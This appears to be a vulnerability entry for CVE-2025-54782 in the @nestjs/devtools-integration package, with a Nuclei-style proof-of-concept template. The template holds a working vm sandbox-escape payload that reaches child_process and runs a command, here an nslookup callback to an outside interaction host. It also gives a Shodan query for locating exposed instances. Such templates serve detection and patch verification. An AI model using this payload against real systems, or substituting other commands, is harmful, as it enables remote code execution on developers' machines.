Nest is a framework for building scalable Node.js server-side applications. In versions 0.2.0 and below, a critical Remote Code Execution (RCE) vulnerability was discovered in the @nestjs/devtools-integration package. When enabled, the package exposes a local development HTTP server with an API endpoint that uses an unsafe JavaScript sandbox (safe-eval-like implementation). Due to improper sandboxing and missing cross-origin protections, any malicious website visited by a developer can execute arbitrary code on their local machine. The package adds HTTP endpoints to a locally running NestJS development server. One of these endpoints, /inspector/graph/interact, accepts JSON input containing a code field and executes the provided code in a Node.js vm.runInNewContext sandbox.
PoC代码[已公开]
id: CVE-2025-54782
info:
name: NestJS DevTools Integration - Remote Code Execution
author: nukunga
severity: critical
description: |
Nest is a framework for building scalable Node.js server-side applications. In versions 0.2.0 and below, a critical Remote Code Execution (RCE) vulnerability was discovered in the @nestjs/devtools-integration package. When enabled, the package exposes a local development HTTP server with an API endpoint that uses an unsafe JavaScript sandbox (safe-eval-like implementation). Due to improper sandboxing and missing cross-origin protections, any malicious website visited by a developer can execute arbitrary code on their local machine. The package adds HTTP endpoints to a locally running NestJS development server. One of these endpoints, /inspector/graph/interact, accepts JSON input containing a code field and executes the provided code in a Node.js vm.runInNewContext sandbox.
impact: |
Malicious websites visited by developers can execute arbitrary code on their local machine through the unprotected /inspector/graph/interact endpoint due to improper sandboxing.
remediation: This is fixed in version 0.2.1.
reference:
- https://socket.dev/blog/nestjs-rce-vuln
- https://github.com/nestjs/nest/security/advisories/GHSA-85cg-cmq5-qjm7
- https://nvd.nist.gov/vuln/detail/CVE-2025-54782
classification:
cvss-metrics: CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
cvss-score: 9.4
cve-id: CVE-2025-54782
epss-score: 0.17543
epss-percentile: 0.94887
cwe-id: CWE-77,CWE-352,CWE-78
metadata:
verified: true
max-request: 1
shodan-query: "devtools.nestjs.com"
tags: cve,cve2025,nestjs,rce,sandbox,devtool,unauth,vkev,vuln
http:
- raw:
- |
POST /inspector/graph/interact HTTP/1.1
Host: {{Hostname}}
Content-Type: text/plain
{"code":"(function(){try{propertyIsEnumerable.call()}catch(pp){pp.constructor.constructor('return process')().mainModule.require('child_process').execSync('nslookup {{interactsh-url}}')}})()"}
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "dns"
- type: word
part: content_type
words:
- "application/plain"
- type: status
status:
- 200
# digest: 490a0046304402206d0fd20b0d14f0855c8d26d25cf6cc1bae7b4186df8bf318235997018e7a452402206306b061d00ba028ba955fd63bd29ff0694b841db283ef84cb07fe73c58d0cfd:922c64590222798bb761d5b6d8e72950